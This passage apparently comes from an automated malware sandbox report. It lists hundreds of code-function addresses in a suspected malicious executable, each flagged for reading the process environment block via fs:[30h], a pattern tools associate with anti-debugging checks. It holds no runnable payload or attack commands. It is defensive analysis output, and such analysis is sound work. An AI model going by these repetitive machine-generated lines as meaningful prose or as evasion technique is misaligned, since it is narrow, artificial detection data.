            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705510F mov eax, dword ptr fs:[00000030h]4_2_3705510F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703510D mov eax, dword ptr fs:[00000030h]4_2_3703510D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F113 mov eax, dword ptr fs:[00000030h]4_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37067128 mov eax, dword ptr fs:[00000030h]4_2_37067128
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37067128 mov eax, dword ptr fs:[00000030h]4_2_37067128
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF13E mov eax, dword ptr fs:[00000030h]4_2_370EF13E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C314A mov eax, dword ptr fs:[00000030h]4_2_370C314A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C314A mov eax, dword ptr fs:[00000030h]4_2_370C314A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C314A mov eax, dword ptr fs:[00000030h]4_2_370C314A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C314A mov eax, dword ptr fs:[00000030h]4_2_370C314A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37103157 mov eax, dword ptr fs:[00000030h]4_2_37103157
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37103157 mov eax, dword ptr fs:[00000030h]4_2_37103157
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37103157 mov eax, dword ptr fs:[00000030h]4_2_37103157
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370CD140 mov eax, dword ptr fs:[00000030h]4_2_370CD140
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370CD140 mov eax, dword ptr fs:[00000030h]4_2_370CD140
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37105149 mov eax, dword ptr fs:[00000030h]4_2_37105149
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706716D mov eax, dword ptr fs:[00000030h]4_2_3706716D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3708717A mov eax, dword ptr fs:[00000030h]4_2_3708717A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3708717A mov eax, dword ptr fs:[00000030h]4_2_3708717A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37059194 mov eax, dword ptr fs:[00000030h]4_2_37059194
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071190 mov eax, dword ptr fs:[00000030h]4_2_37071190
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071190 mov eax, dword ptr fs:[00000030h]4_2_37071190
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_371051B6 mov eax, dword ptr fs:[00000030h]4_2_371051B6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370631BE mov eax, dword ptr fs:[00000030h]4_2_370631BE
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370631BE mov eax, dword ptr fs:[00000030h]4_2_370631BE
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370451C0 mov eax, dword ptr fs:[00000030h]4_2_370451C0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370451C0 mov eax, dword ptr fs:[00000030h]4_2_370451C0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370451C0 mov eax, dword ptr fs:[00000030h]4_2_370451C0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370451C0 mov eax, dword ptr fs:[00000030h]4_2_370451C0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705B1E0 mov eax, dword ptr fs:[00000030h]4_2_3705B1E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705B1E0 mov eax, dword ptr fs:[00000030h]4_2_3705B1E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705B1E0 mov eax, dword ptr fs:[00000030h]4_2_3705B1E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705B1E0 mov eax, dword ptr fs:[00000030h]4_2_3705B1E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705B1E0 mov eax, dword ptr fs:[00000030h]4_2_3705B1E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705B1E0 mov eax, dword ptr fs:[00000030h]4_2_3705B1E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705B1E0 mov eax, dword ptr fs:[00000030h]4_2_3705B1E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370391E5 mov eax, dword ptr fs:[00000030h]4_2_370391E5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370391E5 mov eax, dword ptr fs:[00000030h]4_2_370391E5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370291F0 mov eax, dword ptr fs:[00000030h]4_2_370291F0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370291F0 mov eax, dword ptr fs:[00000030h]4_2_370291F0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F1F0 mov eax, dword ptr fs:[00000030h]4_2_3705F1F0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705F1F0 mov eax, dword ptr fs:[00000030h]4_2_3705F1F0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370CD1F0 mov eax, dword ptr fs:[00000030h]4_2_370CD1F0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37055004 mov eax, dword ptr fs:[00000030h]4_2_37055004
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37055004 mov ecx, dword ptr fs:[00000030h]4_2_37055004
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702D02D mov eax, dword ptr fs:[00000030h]4_2_3702D02D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710505B mov eax, dword ptr fs:[00000030h]4_2_3710505B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031051 mov eax, dword ptr fs:[00000030h]4_2_37031051
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031051 mov eax, dword ptr fs:[00000030h]4_2_37031051
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370D9060 mov eax, dword ptr fs:[00000030h]4_2_370D9060
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37037072 mov eax, dword ptr fs:[00000030h]4_2_37037072
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B7090 mov eax, dword ptr fs:[00000030h]4_2_370B7090
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EB0AF mov eax, dword ptr fs:[00000030h]4_2_370EB0AF
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_371050B7 mov eax, dword ptr fs:[00000030h]4_2_371050B7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF0A5 mov eax, dword ptr fs:[00000030h]4_2_370DF0A5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF0A5 mov eax, dword ptr fs:[00000030h]4_2_370DF0A5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF0A5 mov eax, dword ptr fs:[00000030h]4_2_370DF0A5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF0A5 mov eax, dword ptr fs:[00000030h]4_2_370DF0A5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF0A5 mov eax, dword ptr fs:[00000030h]4_2_370DF0A5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF0A5 mov eax, dword ptr fs:[00000030h]4_2_370DF0A5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DF0A5 mov eax, dword ptr fs:[00000030h]4_2_370DF0A5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704B0D0 mov eax, dword ptr fs:[00000030h]4_2_3704B0D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B0D6 mov eax, dword ptr fs:[00000030h]4_2_3702B0D6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B0D6 mov eax, dword ptr fs:[00000030h]4_2_3702B0D6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B0D6 mov eax, dword ptr fs:[00000030h]4_2_3702B0D6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B0D6 mov eax, dword ptr fs:[00000030h]4_2_3702B0D6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706D0F0 mov eax, dword ptr fs:[00000030h]4_2_3706D0F0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706D0F0 mov ecx, dword ptr fs:[00000030h]4_2_3706D0F0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370290F8 mov eax, dword ptr fs:[00000030h]4_2_370290F8
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370290F8 mov eax, dword ptr fs:[00000030h]4_2_370290F8
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370290F8 mov eax, dword ptr fs:[00000030h]4_2_370290F8
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370290F8 mov eax, dword ptr fs:[00000030h]4_2_370290F8
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFF03 mov eax, dword ptr fs:[00000030h]4_2_370AFF03
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFF03 mov eax, dword ptr fs:[00000030h]4_2_370AFF03
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFF03 mov eax, dword ptr fs:[00000030h]4_2_370AFF03
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706BF0C mov eax, dword ptr fs:[00000030h]4_2_3706BF0C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706BF0C mov eax, dword ptr fs:[00000030h]4_2_3706BF0C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706BF0C mov eax, dword ptr fs:[00000030h]4_2_3706BF0C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704DF36 mov eax, dword ptr fs:[00000030h]4_2_3704DF36
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704DF36 mov eax, dword ptr fs:[00000030h]4_2_3704DF36
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704DF36 mov eax, dword ptr fs:[00000030h]4_2_3704DF36
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704DF36 mov eax, dword ptr fs:[00000030h]4_2_3704DF36
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702FF30 mov edi, dword ptr fs:[00000030h]4_2_3702FF30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EBF4D mov eax, dword ptr fs:[00000030h]4_2_370EBF4D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702BF70 mov eax, dword ptr fs:[00000030h]4_2_3702BF70
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031F70 mov eax, dword ptr fs:[00000030h]4_2_37031F70
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705BF93 mov eax, dword ptr fs:[00000030h]4_2_3705BF93
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031FAA mov eax, dword ptr fs:[00000030h]4_2_37031FAA
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702BFC0 mov eax, dword ptr fs:[00000030h]4_2_3702BFC0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1FC9 mov eax, dword ptr fs:[00000030h]4_2_370B1FC9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37029FD0 mov eax, dword ptr fs:[00000030h]4_2_37029FD0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFFDC mov eax, dword ptr fs:[00000030h]4_2_370AFFDC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFFDC mov eax, dword ptr fs:[00000030h]4_2_370AFFDC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFFDC mov eax, dword ptr fs:[00000030h]4_2_370AFFDC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFFDC mov ecx, dword ptr fs:[00000030h]4_2_370AFFDC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFFDC mov eax, dword ptr fs:[00000030h]4_2_370AFFDC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFFDC mov eax, dword ptr fs:[00000030h]4_2_370AFFDC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37033E01 mov eax, dword ptr fs:[00000030h]4_2_37033E01
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFE1F mov eax, dword ptr fs:[00000030h]4_2_370AFE1F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFE1F mov eax, dword ptr fs:[00000030h]4_2_370AFE1F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFE1F mov eax, dword ptr fs:[00000030h]4_2_370AFE1F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AFE1F mov eax, dword ptr fs:[00000030h]4_2_370AFE1F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37033E14 mov eax, dword ptr fs:[00000030h]4_2_37033E14
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37033E14 mov eax, dword ptr fs:[00000030h]4_2_37033E14
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37033E14 mov eax, dword ptr fs:[00000030h]4_2_37033E14
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702BE18 mov ecx, dword ptr fs:[00000030h]4_2_3702BE18
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C5E30 mov eax, dword ptr fs:[00000030h]4_2_370C5E30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C5E30 mov ecx, dword ptr fs:[00000030h]4_2_370C5E30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C5E30 mov eax, dword ptr fs:[00000030h]4_2_370C5E30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C5E30 mov eax, dword ptr fs:[00000030h]4_2_370C5E30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C5E30 mov eax, dword ptr fs:[00000030h]4_2_370C5E30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C5E30 mov eax, dword ptr fs:[00000030h]4_2_370C5E30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702FE40 mov eax, dword ptr fs:[00000030h]4_2_3702FE40
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702DE45 mov eax, dword ptr fs:[00000030h]4_2_3702DE45
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702DE45 mov ecx, dword ptr fs:[00000030h]4_2_3702DE45
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370ADE50 mov eax, dword ptr fs:[00000030h]4_2_370ADE50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370ADE50 mov eax, dword ptr fs:[00000030h]4_2_370ADE50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370ADE50 mov ecx, dword ptr fs:[00000030h]4_2_370ADE50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370ADE50 mov eax, dword ptr fs:[00000030h]4_2_370ADE50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370ADE50 mov eax, dword ptr fs:[00000030h]4_2_370ADE50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702BE60 mov eax, dword ptr fs:[00000030h]4_2_3702BE60
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702BE60 mov eax, dword ptr fs:[00000030h]4_2_3702BE60
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031E70 mov eax, dword ptr fs:[00000030h]4_2_37031E70
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37067E71 mov eax, dword ptr fs:[00000030h]4_2_37067E71
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705BE80 mov eax, dword ptr fs:[00000030h]4_2_3705BE80
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov ecx, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov ecx, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov eax, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov ecx, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov ecx, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov eax, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov ecx, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov ecx, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov eax, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov ecx, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov ecx, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB2 mov eax, dword ptr fs:[00000030h]4_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B7EC3 mov eax, dword ptr fs:[00000030h]4_2_370B7EC3
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B7EC3 mov ecx, dword ptr fs:[00000030h]4_2_370B7EC3
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706BED0 mov eax, dword ptr fs:[00000030h]4_2_3706BED0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F9ED2 mov eax, dword ptr fs:[00000030h]4_2_370F9ED2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071ED8 mov eax, dword ptr fs:[00000030h]4_2_37071ED8
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37033EE2 mov eax, dword ptr fs:[00000030h]4_2_37033EE2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37061EED mov eax, dword ptr fs:[00000030h]4_2_37061EED
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37061EED mov eax, dword ptr fs:[00000030h]4_2_37061EED
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37061EED mov eax, dword ptr fs:[00000030h]4_2_37061EED
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370D3EFC mov eax, dword ptr fs:[00000030h]4_2_370D3EFC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EBD08 mov eax, dword ptr fs:[00000030h]4_2_370EBD08
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EBD08 mov eax, dword ptr fs:[00000030h]4_2_370EBD08
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702FD20 mov eax, dword ptr fs:[00000030h]4_2_3702FD20
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37029D46 mov eax, dword ptr fs:[00000030h]4_2_37029D46
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37029D46 mov eax, dword ptr fs:[00000030h]4_2_37029D46
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37029D46 mov ecx, dword ptr fs:[00000030h]4_2_37029D46
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704DD4D mov eax, dword ptr fs:[00000030h]4_2_3704DD4D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704DD4D mov eax, dword ptr fs:[00000030h]4_2_3704DD4D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704DD4D mov eax, dword ptr fs:[00000030h]4_2_3704DD4D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F5D43 mov eax, dword ptr fs:[00000030h]4_2_370F5D43
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F5D43 mov eax, dword ptr fs:[00000030h]4_2_370F5D43
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031D50 mov eax, dword ptr fs:[00000030h]4_2_37031D50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37031D50 mov eax, dword ptr fs:[00000030h]4_2_37031D50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B1D5E mov eax, dword ptr fs:[00000030h]4_2_370B1D5E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37045D60 mov eax, dword ptr fs:[00000030h]4_2_37045D60
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B5D60 mov eax, dword ptr fs:[00000030h]4_2_370B5D60
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37105D65 mov eax, dword ptr fs:[00000030h]4_2_37105D65
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706BD71 mov eax, dword ptr fs:[00000030h]4_2_3706BD71
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706BD71 mov eax, dword ptr fs:[00000030h]4_2_3706BD71
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702DDB0 mov eax, dword ptr fs:[00000030h]4_2_3702DDB0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37037DB6 mov eax, dword ptr fs:[00000030h]4_2_37037DB6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703BDE0 mov eax, dword ptr fs:[00000030h]4_2_3703BDE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703BDE0 mov eax, dword ptr fs:[00000030h]4_2_3703BDE0
